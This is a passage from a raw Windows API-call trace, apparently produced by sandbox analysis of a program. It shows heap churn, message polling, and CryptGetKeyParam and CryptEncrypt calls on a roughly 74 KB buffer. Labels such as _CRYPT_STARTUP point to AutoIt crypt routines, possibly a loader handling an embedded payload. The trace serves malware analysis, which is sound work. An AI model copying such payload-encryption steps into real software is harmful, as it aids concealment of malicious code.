out: hHeap=0x650000) returned 1 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.698] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.698] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0075.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.699] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0075.699] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.699] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.700] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f9728, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.700] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.700] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.700] CryptGetKeyParam (in: hKey=0x6b8af8, dwParam=0x7, pbData=0x6bb638, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb638*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e630 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.701] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.702] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x7cc6e8 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.702] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0075.702] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.703] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0075.703] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.703] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.703] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.703] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0075.703] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.703] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.703] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.703] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.703] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.703] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.703] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.703] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.703] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.703] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.704] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.705] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x12245, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x12250) returned 1 [0075.705] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.705] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.705] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.705] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.705] CharLowerBuffW (in: lpsz="byte[74321]", cchLength=0xb | out: lpsz="byte[74321]") returned 0xb [0075.705] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.706] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.706] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.706] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.706] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.706] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7cc6e8*, pdwDataLen=0x61e2d8*=0x12245, dwBufLen=0x12250 | out: pbData=0x7cc6e8*, pdwDataLen=0x61e2d8*=0x12250) returned 1 [0075.707] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.707] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.707] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.707] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.707] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.707] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.707] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.707] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.707] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.707] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.707] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.707] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.708] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.708] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.708] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.708] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.708] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.713] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.715] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.715] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.720] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.720] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, 